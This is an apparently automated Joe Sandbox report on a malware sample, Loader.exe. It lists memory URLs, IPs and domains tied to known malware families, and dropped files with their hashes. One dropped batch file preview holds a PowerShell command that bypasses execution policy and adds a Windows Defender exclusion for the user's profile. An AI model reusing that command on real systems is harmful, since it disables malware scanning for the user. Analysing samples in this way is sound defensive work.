                                                                                                                                                        http://java.sun.com/xml/stream/properties/ignore-external-dtdjavaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://javax.xml.XMLConstants/property/accessExternalSchema$javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://javax.xml.transform.stax.StAXSource/featurejavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://apache.org/xml/features/continue-after-fatal-errorjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://apache.org/xml/features/standard-uri-conformantjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://apache.org/xml/properties/internal/document-scannerjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://xml.org/sax/features/use-entity-resolver2javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://bugreport.sun.com/bugreport/javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A418000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://apache.org/xml/properties/internal/entity-resolverjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://java.oracle.com/javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A41D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://xml.org/sax/features/external-parameter-entities8javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://apache.org/xml/features/javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://apache.org/xml/features/generate-synthetic-annotationsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorLoader.exe, 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Loader.exe, 00000000.00000003.2075234832.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000000.2070869856.0000000000409000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://apache.org/xml/properties/internal/stax-entity-resolver1C5javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.slf4j.org/codes.htmla3javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://xml.org/sax/features/allow-dtd-events-after-endDTDjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://apache.org/xml/features/validation/balance-syntax-treesjavaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://www.slf4j.org/codes.html#substituteLoggerjavaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579550
Start date and time: 2024-12-22 23:52:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Loader.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@58/347@12/13
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 71.4%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 80%
                                                                                                                                                                                                                                              • Number of executed functions: 300
                                                                                                                                                                                                                                              • Number of non-executed functions: 124
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 17.253.18.131, 17.253.18.99, 17.253.14.125, 212.138.170.134, 172.217.19.227, 142.250.181.142, 64.233.161.84, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 13.107.246.63, 4.175.87.197, 23.218.208.109
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): pool.ntp.org, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, config.edge.skype.com.trafficmanager.net, otelrules.azureedge.net, slscr.update.microsoft.com, time.apple.com, ctldl.windowsupdate.com, clientservices.googleapis.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, time.g.aaplimg.com, business.bing.com, clients.l.google.com, l-0007.l-msedge.net, config.edge.skype.com, dual-a-0036.a-msedge.net
                                                                                                                                                                                                                                              • Execution Graph export aborted for target javaw.exe, PID 5908 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:53:23 | API Interceptor | 15x Sleep call for process: powershell.exe modified
17:53:58 | API Interceptor | 10337087x Sleep call for process: javaw.exe modified
17:54:13 | API Interceptor | 13x Sleep call for process: medicalanalysis.exe modified
17:54:31 | API Interceptor | 1x Sleep call for process: medicallanalysis.exe modified
17:55:11 | API Interceptor | 1x Sleep call for process: wmplayer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
94.198.159.10 | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
94.198.159.10 | HI6VIJERUn.exe | malicious | RHADAMANTHYS
94.198.159.10 | List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS
94.198.159.10 | download.exe | malicious | RHADAMANTHYS
213.239.239.164 | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | g8ix97hz.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | payload_1.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | ab.vbs | malicious | GuLoader, RHADAMANTHYS
213.239.239.164 | download.exe | malicious | RHADAMANTHYS
194.58.203.20 | medicalanalysispro.exe | malicious | RHADAMANTHYS
194.58.203.20 | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
194.58.203.20 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
194.58.203.20 | HI6VIJERUn.exe | malicious | RHADAMANTHYS
194.58.203.20 | List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
194.58.203.20 | ab.vbs | malicious | GuLoader, RHADAMANTHYS
194.58.203.20 | download.exe | malicious | RHADAMANTHYS
104.37.175.218 | medicalanalysispro.exe | malicious | RHADAMANTHYS
104.37.175.218 | file.exe | malicious | DarkTortilla, RHADAMANTHYS
104.37.175.218 | file.exe | malicious | RHADAMANTHYS
Match | Associated Sample Name / URL | Detection | Threat Name | Context
chrome.cloudflare-dns.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Vidar, Xmrig
  • 172.64.41.3
chrome.cloudflare-dns.com | MS100384UTC.xls | malicious | Unknown
  • 162.159.61.3
chrome.cloudflare-dns.com | SWIFT.xls | malicious | Unknown
  • 162.159.61.3
chrome.cloudflare-dns.com | Ocean-T2I4I8O9.exe | malicious | Unknown
  • 162.159.61.3
chrome.cloudflare-dns.com | ktyihkdfesf.exe | malicious | Vidar
  • 172.64.41.3
chrome.cloudflare-dns.com | pjthjsdjgjrtavv.exe | malicious | Vidar
  • 162.159.61.3
chrome.cloudflare-dns.com | invoice.docm | malicious | Metasploit
  • 162.159.61.3
chrome.cloudflare-dns.com | ep_setup.exe | malicious | Unknown
  • 162.159.61.3
chrome.cloudflare-dns.com | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar
  • 172.64.41.3
chrome.cloudflare-dns.com | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS
  • 162.159.61.3
gbg1.ntp.netnod.se | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
  • 194.58.203.20
gbg1.ntp.netnod.se | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  • 194.58.203.20
gbg1.ntp.netnod.se | HI6VIJERUn.exe | malicious | RHADAMANTHYS
  • 194.58.203.20
gbg1.ntp.netnod.se | List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  • 194.58.203.20
gbg1.ntp.netnod.se | ab.vbs | malicious | GuLoader, RHADAMANTHYS
  • 194.58.203.20
gbg1.ntp.netnod.se | download.exe | malicious | RHADAMANTHYS
  • 194.58.203.20
ntp1.net.berkeley.edu | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
  • 169.229.128.134
ntp1.net.berkeley.edu | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  • 169.229.128.134
ntp1.net.berkeley.edu | H3G7Xu6gih.exe | malicious | RHADAMANTHYS
  • 169.229.128.134
ntp1.net.berkeley.edu | List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  • 169.229.128.134
ntp1.net.berkeley.edu | wE1inOhJA5.msi | malicious | Remcos, RHADAMANTHYS
  • 169.229.128.134
x.ns.gin.ntt.net | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

Match: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dll
Associated Sample Name / URL | Detection | Threat Name
DHzscd9uqT.exe | malicious | STRRAT
AYoF5MX6wK.exe | malicious | STRRAT
Confirm Me.exe | malicious | STRRAT
PInstaller.exe | malicious | STRRAT
123.sfx.exe | malicious | STRRAT
EYOFFTITMDLXZJFFCCGFDTBIY.msi | malicious | Unknown
SSCBOLGZFXVJMEICRNQMJOCDIF.msi | malicious | Unknown
BOCTGZXINFFCD20242108.msi | malicious | Unknown
PGCTGZXFCD20242008.msi | malicious | Unknown
CloudInstaller.zip | malicious | Unknown

Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.917508583779176
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:oNUkh4E2J5xAIAeLCwJRTnSUccji:oN923fAeLDli
                                                                                                                                                                                                                                                                                                              MD5:BBE0F4AF844E9A8F79553715A23B5357
                                                                                                                                                                                                                                                                                                              SHA1:5B26033E8D0C0BA9241AEBFA2B7A51F9CDC61BC6
                                                                                                                                                                                                                                                                                                              SHA-256:CE40472F63CC0F3E70A3C96EB016570F435ECA6E6C4181A92775297EF9484C93
                                                                                                                                                                                                                                                                                                              SHA-512:7268D79E1918D412801AF3F85640E5BA646626F1D2F484FA66178883A1C3CC453DFA8A60EE239E341F64F9C225CBEADA6A1566348C4E6E5EB5DE5EC1A2E2CF19
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657..1734907999212..

Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):142804
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.117004274496417
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:x5BuYAVrgUCPnbCrlkLZGXUyOA6Hh225aKMHRJ:x50gUCDCr82sHcWV8J
                                                                                                                                                                                                                                                                                                              MD5:E344E5149AA71DA552A1E401CEA9CB26
                                                                                                                                                                                                                                                                                                              SHA1:17B8BE63F035D55528226DCBA7C3A8A7DFA8A337
                                                                                                                                                                                                                                                                                                              SHA-256:7AB1222FABD42B4912C20EE31D078C16F5A144701EA9C6CD3D2DE74944794694
                                                                                                                                                                                                                                                                                                              SHA-512:535912E17BF80ACF967B83B140690931D80DE4F0CBEA5C0C5EB10BF62E5C682E8F70B3826B421F7BC3BF11A9B7D83B24C106029E44110D7CE76C16768EC97089
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):605
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.358009436765127
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M6:ML9E4KlKDE4KhKiKhgLE4qE4j
                                                                                                                                                                                                                                                                                                              MD5:9F6A0F406F4A837DEE72C5ABC72990E1
                                                                                                                                                                                                                                                                                                              SHA1:08D2D0026E52C2DC752E4E624C970F80EB9119D3
                                                                                                                                                                                                                                                                                                              SHA-256:E87FCC8AF26C629E5029F3914CE065224940D9B6506ED04DBEA3B8EDCC49AA2D
                                                                                                                                                                                                                                                                                                              SHA-512:10D3E068D401C9C9836DDD9355670114AA982A0CA6CACC34FA3DDD4FF21BDF7FE62083E8A46F7DE667ED228E8B6281C8F65EB531EDDF97F6612F091DA5C9342D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:fLHyIFKL3IZ2KRH9OugYs
                                                                                                                                                                                                                                                                                                              MD5:046745B14D061B6E178B71722C97B95D
                                                                                                                                                                                                                                                                                                              SHA1:2FBB516625B3C7390120BDFE48D7D7528425BBDF
                                                                                                                                                                                                                                                                                                              SHA-256:168CA4AE0871B8F96DB2F547CAD7BF740DD4DB6691CECB466A04B6FC27971810
                                                                                                                                                                                                                                                                                                              SHA-512:5FF76CFBDDA5E711D0B2A58AD247A77B589170FDC55D95E5B74D448EC4AD2A634538721F3C2E4CB8F116376624AEDDBF744169648E0A0C354BBC11444AA809ED
                                                                                                                                                                                                                                                                                                              Malicious:false

Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.893024342771994
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:/qQ1SJJFIMLVQQNb3DM9bWQqA5SOAGQqPJH0cVERAIrFlceGAFddGeWLCXxHNBOn:/W8MLVHMMQ75NAGQO0cbneGgdEYxDOn
                                                                                                                                                                                                                                                                                                              MD5:2658DFC63032F1C8C59C0233C1CC9769
                                                                                                                                                                                                                                                                                                              SHA1:7AAD97674E967259EAD769FE60F8E40B30A9EDD8
                                                                                                                                                                                                                                                                                                              SHA-256:CCFA651CC1C739B06ADCA460DAEA6A1FBF871457E23BD7BCA52B6A7F0EE767C1
                                                                                                                                                                                                                                                                                                              SHA-512:E37E43BB9FCEADD01758D4E6E21AC173F70D3120307A99D9B4A0292ECC0A341322FC77AB9F6765343371A70D1591488D294F9D536D372E372EBA94F02294558A
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:@ECHO OFF.powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE

Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):113664
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1254848254590355
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:P2ddQ131iYPaa6Hh22U1UMkLZGXUySMaj:Ph5kHcTM2kM
                                                                                                                                                                                                                                                                                                              MD5:ABE04EC3EDDF9D00B7E948E5404E172C
                                                                                                                                                                                                                                                                                                              SHA1:B79FD69B7EAAB09DC299B291CFA2570D6B1E7DF1
                                                                                                                                                                                                                                                                                                              SHA-256:073014710DF4373683296AF3863B279D76E6E0958859C7484210D4067F7F2A32
                                                                                                                                                                                                                                                                                                              SHA-512:3E564765D3A0A1FAF34D5D85A4F66D3BE0ED442EA579881116F5B2A09573C3FFE019C34B7C3543FB69EE2B8CBECEBE1078336963E4CBBB098CCB90ACC4B89577
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3313
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.557128068430301
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                                                                                                                                                                                                                                                                                              MD5:FC605D978E7825595D752DF2EF03F8AF
                                                                                                                                                                                                                                                                                                              SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                                                                                                                                                                                                                                                                                              SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                                                                                                                                                                                                                                                                                              SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.271470906740504
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                                                                                                                                                                                                                                                                                              MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                                                                                                                                                                                                                                                                                              SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                                                                                                                                                                                                                                                                                              SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                                                                                                                                                                                                                                                                                              SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Please refer to http://java.com/license..
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2563005536211715
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                                                                                                                                                                                                                                                                                              MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                                                                                                                                                                                                                                                                                              SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                                                                                                                                                                                                                                                                                              SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                                                                                                                                                                                                                                                                                              SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Please refer to http://java.com/licensereadme..
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):111645
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.8590909329531025
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                                                                                                                                                                                                                                                                                              MD5:0E05BD8B9BFCF17F142445D1F8C6561C
